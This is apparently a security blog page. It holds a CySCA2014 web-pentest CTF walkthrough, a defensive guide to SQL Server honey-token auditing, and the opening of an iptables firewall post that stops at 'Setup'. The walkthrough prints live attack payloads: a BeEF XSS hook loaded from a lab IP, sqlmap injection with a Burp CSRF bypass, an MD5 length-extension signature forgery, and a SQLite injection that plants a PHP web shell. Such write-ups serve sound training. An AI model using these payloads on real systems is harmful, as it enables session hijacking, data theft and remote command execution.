Club Status

Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.

CySCA2014 includes a website for a fictional company called Fortress Certifications. The website has several sections: ‘services’, ‘about’, ‘contact’, ‘blog’, and ‘sign in’. The ‘blog’ section of the website is grayed out and as the challenge description indicates, the user has to become ‘VIP’ to gain access to this section of the website.

1

Solving this challenge was fairly straight-forward and easy. Firing up Burpsuite and setting up the web browser to use it as a proxy it quickly became clear that the website uses a cookie on the client machine with a parameter for ‘vip’ to determine if a user is a vip or not. Intercepting a request from the client to the server and changing the value from ‘vip=0’ to ‘vip=1’ granted access to the ‘blog’ section of the website and revealed the flag there.

2

3

4

For anyone new to Burpsuite, here’s some information that will make your life a little easier. You can add ‘match and replace’ rules using ‘Proxy’ -> ‘Options’ to automatically change the cookie value from ‘vip=0’ to ‘vip=1’ in the future, so you don’t have to manually change it on each request. Even if you turn intercept off, the request will still be changed. As long as the rule is marked ‘enabled’ you will remain vip.

5

Om nom nom nom

Gain access to the Blog as a registered user to reveal the hidden flag.

Although we now have access to the blog, we are still identified as ‘guest’ as can be seen in one of the previous screenshots. This challenge requires us to become authenticated as a registered user. Our first instinct was to bruteforce our way in through the ‘sign in’ section of the site, using a list of usernames that was previously found under ‘contact’.

6

There are various ways in which a login form can be attacked, such as using the ‘intruder’ tool in Burpsuite or using a command line tool such as Hydra. Both of these tools and multiple wordlists were used in an attempt to find a valid combination of username and password, but after several hours of bruteforcing we had to acknowledge that becoming authenticated wouldn’t be as simple as that. In fact, had we taken the time to read the FAQ section of the challenge site we could have saved ourselves a significant amount of time, since it clearly states that bruteforcing passwords is never required.

7

Alright, so another method of becoming authenticated needs to be found. After browsing around the website and the blog for quite some time trying to find another way in, we noticed that a user was active on one of the blog posts. ‘Sycamore’ had last viewed one of his posts as recently as 37 seconds ago. Clearly there was an automated job set up on the Cysca box where this page was being refreshed regularly while being logged in as user Sycamore.

8

The first thing that came to mind was to use a cross site scripting (XSS) attack to steal Sycamore’s session ID. However, after leaving numerous comments with XSS code in various formats it became clear that comments were being filtered for this. So if we can’t inject XSS code into the site, how do we steal Sycamore’s session ID?

One thing that we have really enjoyed during almost all of the CySCA2014 challenges we’ve solved so far is that the solution can often be found in small details. In this case, we finally noticed a note underneath the comments section that said: “Links can be added with [Link title](http://example.com)”. So although we can’t insert XSS code into a comment directly, maybe we can add it to a link reference.

We fired up the ‘Beef-xss’ application and – after some playing around with different formats – submitted the following comment:

[<script src=”http://192.168.159.128:3000/hook.js”></script>(www.example.com)pwnt]

When viewing the blog entry, the comment only shows up as “pwnt”, but in the background the user’s browser is actually being redirected to 192.168.159.128:3000/hook.js, which ‘hooks’ it into beef-xss and allows us to manipulate it in all sorts of ways. In this case, all we really needed was to steal the session ID from the cookie and use it instead of our own session ID. After doing so, we were successfully authenticated as ‘Sycamore’ and the second flag was shown on the screen.

9

 

10

11

12

Remember, like before you can add a ‘match and replace’ rule to Burpsuite to automatically replace your own session ID with Sycamore’s so that you don’t have to manually replace it every time.

Nonce-sense

Retrieve the hidden flag from the database.

This is where things really started to get challenging. The previous challenge gave us some trouble for a while, but the whole time we knew we were at least on the right track. With this one we had some moments where we were ready to give up. Fortunately, we stuck with it and after many hours of banging our heads against the wall we finally gained access into the database. Here’s how we did it.

Right away, seeing how the flag had to be retrieved from a database, we figured SQL injection would be the way to go. However, during the previous challenge we had moments where we couldn’t figure out how to authenticate as Sycamore and in those moments we had already tested most of the parameters in our GET and POST requests for SQL injection – without success. Still, it didn’t take too long for us to find the parameter that could be injected. Now that we were authenticated as Sycamore we were able to delete comments, and the ‘comment_id’ parameter proved vulnerable to SQL injection. We found out by adding a single quote behind the comment_id value and looking at the server response.

13

14

Once we found out that the parameter was vulnerable to SQL injection, we figured we were pretty much done. We couldn’t have been more wrong – this is where the challenge really started. There were several issues we had to overcome before we could go from vulnerability to exploitation.

First of all, the server responses to our SQL injection didn’t correspond to any write-ups of SQL attacks we could find. For instance, one of the first things that write-ups will tell you to do is figure out how many columns are in the table that you’re accessing. You can do this by adding a single quote to the parameter value and then adding “order by 10;–”, which should tell the SQL server to sort the results by column number 10. This will either result in a valid SQL statement, which you can recognize by the command going through (the comment will be deleted), or it will give an error message such as “unknown column ‘10’ in ‘order clause’”. The latter indicates that there are less than 10 columns in the table, so then you have to narrow it down until the command goes through. However, when we tried the ‘order by’ SQL injection, we received the following response from the server:

15

The server response indicated that it recognized everything we added after the parameter value as incorrect, including the single quote. In other words, we were not successful in ‘breaking out’ of the SQL statement that we were trying to inject into.

We must have spent hours trying to find the right SQL injection to return valuable server information, without any success. Everything we entered would just return the same error message to us (Later on we’ll see that we weren’t encoding our SQL injection commands correctly). At this point you might ask “why didn’t you just use an automated tool such as SQLmap?” Great question; this brings us to issue number two.

The website blog section uses CSRF tokens to prevent cross site request forgery (CSRF). These tokens were also successful in stopping us from running automated SQL injection tools. The reason is that every time a request is issued to the server, it has to include a valid CSRF token. The consequent server response includes a new CSRF token, which has to be issued with the next server request. A token is only valid once, and it is only valid for about 15-30 seconds. We’re not sure exactly of how long it’s valid for but if we waited too long in issuing a request to the server we would invariably get an “invalid CSRF token” error message.

16

We will spare you all the different ways in which we tried to circumvent this error message; we assume that since you are reading this walkthrough you already tried most if not all of those same tactics and discovered they did not work. The key to success for us was provided through BurpSuite’s ability to run a macro for each incoming request. So basically what we did was tell BurpSuite that every time a server request was intercepted, it had to run a macro that would retrieve the latest CSRF token and to replace the original token with the new one before sending the request on to the server.

Let’s look at that step by step. First, set up the macro that you will use. It needs to be a server request that obtains the new CSRF token, so a simple GET request for a blog page will do just fine. To configure the macro, go to ‘Options -> Sessions -> Macro’ and create a new macro.

17

18

When you ‘record’ the macro, just select a simple GET request for a blog page from your HTTP history. Now here’s the important part – you have to go to ‘configure item’ and select a custom parameter location from the server response. This is where we go to select the CSRF token and use it as a parameter in our next request. BurpSuite offers the awesome functionality of allowing you to just select what you wish to extract, and it will generate the appropriate syntax for you.

19

20

Now that the macro is set up, we need to create a session handling rule under ‘Options -> Sessions -> Session Handling Rules’. The rule has to specify to run our macro, under ‘rule actions’. You also have to set a scope for the rule, by clicking on the ‘scope’ tag. Here you will only select ‘proxy’ for when the rule will run, and for ‘URL scope’ you can either select ‘include all URLs’ or you can be more specific by selecting ‘use suite scope’. The latter requires you to go to ‘Target -> Scope’ and make sure you have the Cysca box’s URL defined as a target.

21

22

23

24

Now Burpsuite is configured to replace the CSRF token of incoming requests (sent using Burpsuite as a proxy) with a new and valid CSRF token. The next step is to configure SQLmap to perform SQL injection into the vulnerable parameter and to use Burpsuite as a proxy. The first thing we want to do is generate a ‘delete comment’ POST request that we can use as a template for SQLmap. Generate a ‘delete comment’ request or select one from your HTTP history (make sure it contains Sycamore’s PHPSESSID value in the cookie) and save it into a text file (we just used Leafpad for this). NOTE: Be careful – certain text file editors (vi) will include extra line feeds when you copy and paste a request from Burp into it. These extra line feeds WILL mess up your requests and provide you with invalid results. We spent several hours trying to troubleshoot our macro when all we had to do to get things to work was remove the extra lines from the template file. No fun!!

Alright, now it’s time to fire up SQLmap, tell it to use the text file with the POST request as a template (-r), inform it of which parameter to inject (-p), and point it to BurpSuite as a proxy (–proxy).  The command for this is:

sqlmap -r <full path to request file> -p comment_id –proxy=http://127.0.0.1:8080

I would advise to do two things before running this command. (1) Enable intercepting on Burpsuite so that you can see the request that SQLmap is sending out to the server, and (2) go to ‘Options -> Session -> Session Handling Rules’ and click ‘open sessions tracer’. The sessions tracer shows the original incoming request, the macro that is ran, the action taken as a result of running the macro, and the final request that is sent out to the server. You can look at each of these steps and verify that your macro is running correctly and that it is in fact replacing the CSRF token from the template with a new one from the server for each request made. Notice that the SQL injection that is added to the ‘comment_id’ parameter is HTML encoded. This is why we were previously unable to get information back from the server using manual SQL injection – we weren’t encoding our commands properly.

One more tip for this challenge; if you followed all of the steps described here and you are still having trouble performing SQL injection into the comment_id parameter, try running sqlmap with a delay on its requests (–delay = 1 for a 1 second delay). We ran into a situation where our macro was running as intended, and looking at the individual requests in the session tracer showed that Burpsuite was inserting a fresh CSRF token into each request before sending it on, but we were still getting ‘invalid CSRF token’ errors in our responses. Again, we must have spent hours troubleshooting this issue when in the end, including a simple one-second delay in our SQLmap request fixed the issue. We’ve also been able to successfully run attacks against the server without this delay so it doesn’t seem to be required, but it’s just something that seemed to work for us when it wouldn’t work without the delay. We thought we’d include it in this walkthrough in case someone else experiences the same thing.

25

26

27

28

Now that we can successfully run a SQL injection attack against the server, getting the hidden flag is a piece of cake. First we need to enumerate all the databases on the server by using the ‘– dbs’ command. This will reveal that there are two databases: ‘cysca’ and ‘information_schema’. For this challenge, only the ‘cysca’ database is of interest. Next we have to enumerate the tables in the cysca database. We can do this by specifying the database with ‘-D sysca’ and using the ‘– tables’ flag. There are five tables in the ‘cysca’ database: ‘user’, ‘blogs’, ‘comments’, ‘flag’, and ‘rest_api_log’. Finally, we can dump the information in the ‘flag’ table using the ‘-D cysca’, ‘-T flag’, and ‘–dump’ flags. This reveals that the hidden database flag is “CeramicDrunkSound667”.

29

30

31

Hypertextension

Retrieve the hidden flag by gaining access to the caching control panel.

Our first question upon reading this challenge was “What the fuck is the caching control panel??” We had never heard of this before, despite at least one of us being somewhat familiar with web servers. Google did not help us out much, so we figured we’d just start on the challenge and hoped that it would become clearer as we made progress.

We started on this challenge by enumerating pretty much everything in the database that we had just compromised. The screenshots below show some of the information that was logged into the ‘log’ file for the server under /usr/share/sqlmap/output.

32

33

The ‘users’ table provided us with information on three registered users, including their password hashes and salts, while the ‘rest_api_log’ table provided GET, POST, and PUT requests that had been previously submitted to the server, including an API key for one user.

Our first attempt at making progress on this challenge was to try and crack the user passwords. Again, this was a waste of time as bruteforcing is never required according to the Cysca FAQ. However, we reached this point before any of us had looked at the FAQ. Hopefully you did not make the same mistake. Needless to say; running hashcat with multiple wordlists and rules did not result in any cracked passwords.

Next we decided to see if we could attack the site’s rest API. On the website’s blog there is a post made by Sycamore that refers to the rest API specification, located at “<cysca>/api/documents/id/3”. Below is a screenshot of the document.

34

The document describes a couple of things: (1) that any request that modifies content (POST, PUT, and DELETE) needs to be signed with an API signature, (2) how a valid API signature is calculated, (3) what parameters need to be included in GET, POST, and PUT requests, and (4) what a valid and signed POST request looks like. At this point it was pretty clear that we needed to find a way to submit valid POST and /or PUT requests to the server. We didn’t know how it would help us locate the flag in the caching control panel, but we knew it would help us get there. So somehow we need to find a way to create valid API signatures.

The problem is that the calculation for an API signature includes a shared secret. Without the shared secret, it is impossible to create a valid API signature – at least at first glance. Our first attempt at creating an API signature…. Bruteforcing. Seriously – I will never again attempt a CTF challenge without reading the FAQ first.

Our thought process was as follows: We couldn’t crack the password hashes that we found in the database, but we assumed that a user’s password would be the same as their ‘shared secret’ for their API signatures. Since we had obtained a couple of valid API calls including signatures from the database, we might be able to uncover the secret by recreating the known API call and using a wordlist to insert the secret into it. The assumption here is that we were unable to previously crack the passwords due to them being salted, but now we might be successful because the salt doesn’t come into play for the API signature.

We created a script that took the string “contenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf”, inserted an entry from a wordlist in front of it (as the secret), created an MD5 hash of the string, and then compared this MD5 hash to the one we knew to be valid for the API call. If the wordlist entry was equal to the secret, then the two MD5 hash values should be the same. Of course, even after using several different wordlists (and waiting for long periods of time for the script to finish) we did not find the secret. So now we were somewhat at a loss. If we don’t know the secret we can’t create valid API signatures, and if we can’t create these signatures then we can’t place valid API calls.

So we did what you should always do when you are at a loss for answers: we turned to Google. After a couple of different queries one of us stumbled on something called a ‘length extension attack’. A length extension attack is something that can be used to calculate a valid hash when you have the hash of (secret + message) and you know both the message and the length of the secret, even if you don’t know the secret itself. This sounded almost exactly like what we were faced with, although we didn’t know the length of our secret.

Length extension attacks work due to a vulnerability in numerous hashing algorithms, including MD5. The vulnerability has to do with how these algorithms calculate a hash value. For instance, MD5 uses blocks of a specific length (512 bits). The value of (secret + message) is padded with a ‘1’ bit and a number of ‘0’ bits followed by the length of the string (the string being secret + message). So while the hexadecimal value of (secret + message) might be “73 65 63 72 65 74 64 61 74 61” (secretdata), the MD5 algorithm will add padding and a length indicator to it before hashing so that it looks like this:

“73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00”

So how can this be exploited? Well, the specifics get a little complicated here, so we’ll refer you to two excellent sources on the details of length extension attacks: https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks and https://blog.whitehatsec.com/hash-length-extension-attacks/.

Although we can’t say we completely understand the specifics of length extension attacks, we’ll try to put into words our understanding from what is explained in the two sources above in the hopes we don’t fuck it up too much. Basically, you can add information to the string that you want to include in the calculation of the hash. For instance, instead of hashing “secretdata” we might want to calculate the hash of “secretdatamoredata” The length extension attack will not work if you simply add stuff to the original message. However, it WILL work if you include the padding, and then add additional information to the end of that. Adding the hex value “6d 6f 72 65 64 61 74 61” (moredata) to the end gives us:

“73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00 6d 6f 72 65 64 61 74 61” The MD5 hashing algorithm will first calculate the hash for the first 512 bits (which will result in the hash that we already know) and it will use that value as a starting point for the calculation of the added data. Since we know the original hash, we can add information to the message without ever knowing the secret and still calculate a valid hash value! However, we do need to know the length of the secret because otherwise we would not know how much padding to add to get to 512 bits. So let’s move on from the theory and look specifically at how we were able to implement the length extension attack.

As mentioned previously, we understood the gist of the length extension attack but we didn’t know enough about hashing algorithms or cryptography to execute this attack ourselves from scratch. Fortunately there are smarter people than us around who wrote tools to make such an attack a lot easier to do. Two such tools are ‘HashPump’ and ‘hash_extender’, both of which can be downloaded from Github. We ended up using HashPump so I will use that in my write-up of the challenge, but hash_extender offers the same functionality and both are very easy to use.

To use HashPump it requires the following arguments: (1) original message, (2) original hash, (3) message / data to add, and (4) length of the original secret. We had three out of these four arguments – we did not know the length of the secret. To overcome this obstacle we wrote a script with a loop that included the three variables we did know and incremented the value for ‘length of the original secret’ by one on each loop. At the end of each loop it would submit a POST request to the server, formatted according to the description in the rest-api-v2.txt document and it would display the resulting server response. Please note that we didn’t get all the syntax and formatting correct in this script right away. Like everything else during Cysca2014 it took us several hours to write a script that did exactly what we wanted. For instance, figuring out that the padding provided by HashPump needed to be converted from ‘\x00’ to ‘%00’ before the server would accept the request took a very long time by itself. But eventually we were rewarded for our efforts with a server response that said “error: file path does not exist”. We now knew that the length of ‘secret’ was 16 characters.

35

36

So now we have all the information we need to create valid API signatures, right? Yes and no. Yes, we can create a valid signature for certain types of modified requests, but what can we do now? We can’t modify the original request (at least, at this point we didn’t think we could) because the length extension attack depends on the original message and hash to calculate a new one for the appended data. So all we can do is add something to the end. We tried moving back directories (adding ‘/../../../../var/www/index.php’) and even pointing to files that we knew existed (adding ‘/../rest-api-v2.txt’) but no matter what we added, we always received the “error: file path does not exist” message. Clearly we were still missing something.

After more experimentation and Googling, we finally came across some helpful information. Ironically, this information was found on the Github page (https://github.com/bwall/HashPump) for the tool that we had been using all along – HashPump – driving home once again the importance of attention to detail and carefully going through documentation. Looking at their example of a length extension attack, the information that they append to the original request is actually a parameter that has already been assigned a value. The idea here is that the parameter is given the value that was assigned to it last, so by re-assigning a value to the parameter you can actually overwrite the original value without having to modify the original request. The screenshot below shows what that would look like in HashPump. We’re giving the ‘filepath’ parameter a new value. However, the server does not accept our new API signature as valid.

37

We’ve seen previously that our method of calculating new API signatures with a length extension attack is correct, so we must be doing something else wrong. As it turns out, we were doing two things wrong. First of all, we weren’t adding the new value for filepath to HashPump in the correct way. Remember, the REST API documentation specifies that all ‘&’ and ‘=’ symbols need to be removed from the parameter list when calculating the API signature. Although we were doing this in HashPump for the original message, we completely forgot to do it for the appended information. So the server would calculate the API signature on the string “SECRETcontenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdffilepath/../../../../var/www/index.php”.

Meanwhile HashPump was calculating the API signature on the string “SECRETcontenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf&filepath=/../../../../var/www/index.php”.

Clearly, these strings would lead to different API signatures. However, after correcting this mistake the server would still not accept our API signature. Apparently the server was processing the request differently than we were expecting. Maybe it was not simply overwriting the parameter with the last assigned value, or maybe it was overwriting it before calculating the API signature. In both of those cases, the resulting API signature would be different from the one we calculated using HashPump.

38

Again we returned to Google for ideas on what to do next, and this time we stumbled on one of the most famous examples of a length extension attack: The exploitation of Flickr’s REST API in 2009. A write-up of this attack can be found here: http://netifera.com/research/flickr_api_signature_forgery.pdf.

We noticed two things while reading this write-up: (1) the scenario provided in this Cysca challenge is identical to the vulnerability in Flickr’s REST API down to the description of the API itself, and (2) we completely missed a vulnerability in how the API signature is calculated. What we failed to pick up on initially is that with the way an API signature is calculated, a signature for “filepath=./example.pdf” is equivalent to the signature for “f=ilepath./example.pdf”. The reason for this is that for the calculation of the signature, the ‘&’ and ‘=’ symbols are removed from the string, so for both examples the resulting string on which the signature is calculated would be “filepath./example.pdf”. This is the crucial factor in this challenge that allowed us to generate valid API keys while modifying the original request.

We ended up using this information by assigning almost everything in the original message to a parameter named just ‘c’ – the first letter in the original message – that would be ignored by the server, since ‘c’ is not a parameter that makes sense to the server. We then used HashPump to append the original parameter names to the request and generate a valid signature. The following screenshots show what that looks like, from the command line as well as the request that was issued to the server.

39

40

Finally! We were able to modify the values for the parameters that get submitted to the server while still being able to use the original message to perform a length extension attack and generate a valid API signature!

Now, all we have to do is find the path to an existing file on the server. We know that the file ‘index.php’ exists, since it gets included in the URL to reach the Fortress Certifications front page. Apparently, it is not located at ‘/var/www/index.php’, which is where it commonly resides. Instead, it is located in the same directory as the ‘documents’ folder. This was found out after trying a couple of different requests with different file paths, until the message below was received.

41

This message indicates that the REST API created a new link to a document – ‘index.php’. The link is located at http://192.168.198.128/api/documents/id/14. Note that the IP address for the host has changed from before (it used to be 192.168.159.129) but this is because of changes in our virtual network settings and not because of the request to the REST API.

Navigating to this URL provides us with a download prompt, and opening the downloaded file provided us with more information about other files that might be worth looking at: ‘cache.php’, and ‘caching.php’.

42

We can repeat the same process as before to also create links to these files through the REST API. After doing so, and opening ‘cache.php’, we found the flag that marks the completion of this challenge: “OrganicPamperSenator877”.

43

Injeption

Reveal the final flag, which is hidden in the /flag.txt file on the web server.

The ‘index.php’ and ‘cache.php’ files tell us how we can get to the caching control panel. We need to generate an MD5 hash of “OrganicPamperSenator877” and append it to http://<host>/cache.php?access=”. Doing so brings us to the page below.

44

The caching control panel enables the caching of certain pages. We can enter a title and a URL for a page, and it will be stored as a cached page in the backend database. How this works exactly can be learned by investigating the source code for ‘cache.php’ and ‘caching.php’. These pages contain the functions and logic that work behind the scenes when a request is submitted through this page, and thoroughly investigating the source code can reveal any flaws or vulnerabilities in the caching process.

Through code investigation and some experimentation we were able to determine that the ‘Title’ field is vulnerable to code injection. After submitting a query, the function that inputs the data into the database is “setCache”, which takes the parameters ‘key’, ‘title’, ‘uri’, and ‘data’. Additionally it uses the database function ‘datetime()’ to insert the date and time of when the query was submitted into the database. This function can be seen below. The ‘title’ and ‘uri’ variables come from what we enter into the caching control panel. The ‘key’ variable is an MD5 hash of the server name plus the requested URI, and ‘data’ is the contents of the page that was entered into the ‘URI’ field.

45

It’s possible to break out of this function through the use of single quotation marks and entering self-chosen values for the variables that the function is expecting. The result of doing so can be seen below.

46

 

47

Even though we get a syntax error, generated by the remaining code behind our injection, the function executes just fine and our self-chosen values get entered into the database. Additionally, by using a SQLite function – random() – in our injection we determined that we can successfully execute other SQLite functions besides datetime(). We knew the backend database was SQLite because this was specified in the source code of ‘caching.php’

This is where we got stuck on this challenge. It seems clear that we have to use code injection and database functions to get to the ‘/flag.txt’ file on the server, but there are two constraining factors that make this challenge extremely difficult: (1) there is a character limit of 40 characters on the ‘Title’ field in the caching control panel. This makes it almost impossible to inject anything useful, and (2) while there is no character limit on the ‘URI’ field, anything entered into this field gets parsed and validated by functions in ‘caching.php’, which makes it seemingly impossible to inject anything into this field.

We spent many hours experimenting with different types of injections and different strategies. We found a page online that explains how to exploit a SQLite database through the use of the ‘ATTACH DATABASE’ command: http://atta.cked.me/home/sqlite3injectioncheatsheet. However, it seemed like this strategy would not work for us due to the limit on how many characters we could enter. Eventually we decided that this challenge was beyond us and we decided to look at the walkthrough posted on the CySCA2014 website: https://cyberchallenge.com.au/CySCA2014_Web_Penetration_Testing.pdf.

Since we didn’t solve this challenge, I won’t provide a description of the solution. Instead I recommend you follow the link above for a walkthrough of the problem. After reading the solution, we were glad we didn’t spend more time on trying to solve it than we already had because the walkthrough blew our minds. There was no way we could have figured this out for ourselves. We were on the right path but the steps that had to be taken to get around the character limit were ridiculous. For the remainder of this walkthrough I will focus on explaining the steps in the CySCA solution, since I don’t think their walkthrough provides a lot of clarification on how to get to ‘/flag.php’. Even after following their steps it took us some time and reasoning to figure out why they worked.

The walkthrough describes that the goal is to inject the following 122-character string into the database:

‘,0); ATTACH DATABASE ‘a.php’ AS a; CREATE TABLE a.b (c text); INSERT INTO a.b VALUES (‘<? system($_GET[”cmd”]); ?>’);/*

The way this is accomplished is by breaking the string up into smaller sections and piecing them back together at a later point. The four strings that are individually injected will be:

  1. ”,0);ATTACH DATABASE ”a.php” AS a;/*
  2. */CREATE TABLE a.b (c text);INSERT /*
  3. */INTO a.b VALUES(”<? system($”||/*
  4. */”_GET[””cmd””]); ?>”);/*

Each string starts with the end to a block comment (*/) and ends with the start to a block comment (/*), except for the first string which doesn’t start with one. This ensures that any code that might make its way in between these strings is commented out – this is what allows these individual database entries to be pieced back together into a single injection string. After performing the code injection, the caching control page will look as below:

48

You’ll notice that the third entry looks incomplete. However, investigation of the source code of the page reveals that the injected code is all there, it’s just being interpreted differently by your browser.

49

So what is this supposed to do, once pieced back together? The ‘ATTACH DATABASE’ command will attach a database file to SQLite, but if this file doesn’t exist it will be created. Therefore, effectively this command is creating a file called “a.php”. The rest of the commands first create a table in the newly created database (table a.b) with a single column named ‘text’. One line is inserted into this database table: “<? System($’ ||’_GET[‘’cmd’’]”. This code will eventually find its way into the database file ‘a.php’, and ‘a.php’ should then be accessible as a web page where it will attempt to execute a given system command. So effectively the injection code will provide us with a shell on the system through a web page.

The way in which these four lines of code are pieced back together is by caching the ‘cache.php’ page itself. It took us a while to reason out how caching the caching page would execute this code, but it works because of the first line of injection code. You’ll notice that it starts with “’,0);”. Thinking back to the ‘setCache’ function in the ‘caching.php’ source code you’ll remember that it required five variables, the fourth of which was ‘$data’. The ‘data’ variable contained the source code for whatever page was being cached. By starting the first line of injection code with “’,0);” we’re effectively breaking out of the ‘data’ variable and executing the code that comes after – the code that attaches the database.

So by caching the ‘cache.php’ page, the setCache() function will look at the source code for the page that is being cached: ‘cache.php’. On the page it will encounter the first line of injection code, which breaks out of the ‘data’ variable. It then executes the rest of the code until it gets to the block comment marker (/*). It ignores whatever comes next until the end of the block comment marker is encountered, which is at the beginning of the next line of injection code. This continues until all four lines of injection code have been pieced together, and they then get executed, causing ‘a.php’ to be created with the code that allows us to execute commands on the system. The screenshots below show this process.

50

NOTE: I messed up my commands, resulting in a file ‘a.php’ which did not allow me to execute system commands. I entered everything again but of course table ‘a’ and column ‘a.b’ already existed, so in the rest of the screenshots you will see ‘z.php’ and database ‘z’ instead.

51

52

As shown above, accessing ‘z.php’ and feeding it the ‘ls’ command returns the contents of the working directory. The SQLite information at the start of the file is there because SQLite created ‘z.php’ as a database file, so it has additional database information in it. It doesn’t interfere with our commands though, and feeing the system command ‘cat /flag.txt’ returns to us the final flag for the web application pentest section of CySCA2014: “TryingCrampFibrous963”.

53

Creating a Honey Token on a Microsoft SQL Server

This walk-through is meant to provide DBAs or system admins working with databases with a method of implementing a honey token for security purposes. The method outlined in this walk-through is not the only method of implementing a honey token, and no guarantees will be made that this method is the best out of all options. It is simply the method that was used based on the DBA’s knowledge of the system and the alternatives.

A honey token is a piece of information – or a collection of pieces of information – that serves no purpose other than to alert stakeholders of possible unauthorized access to sensitive data. In this walk-through the honey token is a fake table in a production database. The table was created and populated with information by the DBA and unlike the other hundreds of tables in the same database it is not used for any legitimate purpose. The program that relies on the database will never hit the honey token table. Therefore, any time the table is accessed it can be assumed that someone has obtained unauthorized access to the database and is trying to find out what information is contained within all of the tables.

Implementing the honey token was not as easy as originally expected, which is why this walk-through was created – to help anyone else out there looking to accomplish the same. Creating a fake table is easy enough but how do you know when someone accesses it? At first the idea was to have a trigger send out an email alert any time the table is used. The problem with this is that a trigger can only be set for events that alter the table, meaning when someone inserts, deletes, or modifies information. A trigger cannot be set for a simple select statement, which is most likely to occur after an attacker gains unauthorized access to the database.

After some Googling I found that while a trigger cannot be set for select statements, the desired effect can be obtained by setting up a server audit. The Microsoft Knowledge Base has a resource up that describes the process of setting up a server audit and contains an example script that is easily customized for any environment.

Setting up a Table Audit

The first step is to create a fake table in your database – the honey token. Make sure that the table name doesn’t give away that it is a honey token. It has to follow the naming structure of the rest of the database so that it appears generic. It also needs to be populated with data. While you will still get a notification if an attacker queries an empty table, the idea is to not tip off the attacker that anything is out of the ordinary. Make sure that it contains only data that is pretty much useless to any attacker – you wouldn’t want to accidentally give them anything they can use.

After the Honey Token table has been created you can set up the audit on it. The T-SQL commands that I ended up using were as follows. Make sure to create the folder structure for the audit file before running this script or the commands will fail.


 

USE master;

GO

CREATE SERVER AUDIT <Enter Server Audit Name>

TO FILE ( FILEPATH = ‘<path to audit file>’ );

GO

ALTER SERVER AUDIT <Enter Audit Name>

WITH (STATE = ON);

GO

USE <Enter DB Name>;

GO

CREATE DATABASE AUDIT SPECIFICATION <Enter Specification Name>

FOR SERVER AUDIT <Enter Audit Name>

ADD (SELECT ON <Enter Table Name> BY PUBLIC)

WITH (STATE = ON);

GO

SELECT *

FROM <Enter Table Name>;

GO

SELECT *

FROM fn_get_audit_file(‘<path to audit file>’, NULL, NULL);

GO


 

Now the audit has been set up. Any select statement executed on the audited table will produce a new entry in the audit file, which can be confirmed by executing the last two select statements from the script once or twice.

Automatic Notification

Of course, the goal is to get notified automatically if someone without authorized access is looking around in your database. To accomplish this, a stored procedure in combination with an automated job can be used. The stored procedure queries the audit file for any new entries since the last time the job was ran and if it finds any, an email is sent out. The automated job simply executes the stored procedure on a schedule. To get alerts as quickly as possible the job needs to be run often, such as every minute. The code for the stored procedure that was used is as follows. Note that the audit time the stored procedure will look at has been adjusted to -7 hours. This is because the audit time is always recorded in UTC and -7 hours represents a correction for this. Make sure to adjust this correction to what is appropriate for your time zone.


 

CREATE PROCEDURE <Enter SP Name>

@recipients varchar(max) = ‘<enter recipients’ email addresses>’

AS

 

Declare @results Table

(

event_time datetime,

action_id varchar(5),

session_server_principle_name varchar(100),

server_instance_name varchar(100),

database_name varchar(100),

[object_name] varchar(100),

[statement] varchar(max),

additional_information varchar(max)

)

 

— find last time stored procedure ran – save datetime as variable

declare @lastrun datetime =

(

Select Top 1

Convert

(

DateTime,

Stuff(Stuff(Convert(VarChar, run_date), 7, 0, ‘-‘), 5, 0, ‘-‘)

+ ‘ ‘

+ Right(‘0’ + Convert(VarChar,(run_time % 1000000) / 10000), 2)

+ ‘:’

+ Right(‘0’ + Convert(VarChar,(run_time % 10000) / 100), 2)

+ ‘:’

+ Right(‘0’ + Convert(VarChar,(run_time % 100) / 1), 2)

) As Lastrun

From msdb.dbo.SysJobHistory With (NoLock)

Where step_name = ‘Server Audit’

Order By instance_id Desc

)

 

— query audit file for any new entries since last time stored procedure ran

Insert Into @results

(

event_time,

action_id,

session_server_principle_name,

server_instance_name,

database_name,

[object_name],

[statement],

additional_information

)

 

Select

dateadd(hh, -7,event_time) as event_time — -7 hours bc event_time is logged in UTC

,action_id

,session_server_principal_name

,server_instance_name

,database_name

,[object_name]

,[statement]

,additional_information

FROM fn_get_audit_file(‘<Enter path to Audit file>’, NULL, NULL)

Where dateadd(hh,-7,event_time) > @lastrun

 

select [statement] from @results

 

— if there are new results, send out email

DECLARE @body NVARCHAR(MAX) =

‘<html><body><H3>Alert</H3>’

+ ‘</br>’

+ ‘A honey token table was accessed. Someone might be trying to access your database without permission!’ + ‘<br>’

 

If exists(select 1 from @results)

begin

SELECT @body = @body

+ ‘<br>’

+ ‘Time: ‘ + Convert(VarChar,event_time) + ‘<br>’

+ ‘Server: ‘ + server_instance_name + ‘<br>’

+ ‘Database: ‘ + database_name + ‘<br>’

+ ‘Table: ‘ + [object_name] + ‘<br>’

+ ‘Username: ‘ + session_server_principle_name + ‘<br>’

+ ‘Query: ‘ + [statement] + ‘<br>’

from @results

EXEC msdb.dbo.sp_send_dbmail

@profile_name = ‘<Enter Profile Name>’,

@body = @body,

@body_format =’HTML’,

@recipients = @recipients,

@subject = ‘Honey Token Alert!’ ;

end


 

Now simply create an automated job that executes this stored procedure every minute and you will be notified by email any time the Honey Token table is queried.

Linux IPtables

In this blog post I will describe how to set up a basic firewall on Linux using IPtables. Setting up a firewall is only half the work though; a smart information security professional will also test their firewall configuration thoroughly. I set up a virtual lab environment on my home laptop for testing purposes. To simulate a network with security zones (internal / external) I used a Vyatta router to divide the network into subnets. I set all of this up using VMware Workstation which is a commercial software, but you can simulate this just as well using Oracle’s free VirtualBox.

virtual lab topology

Setup

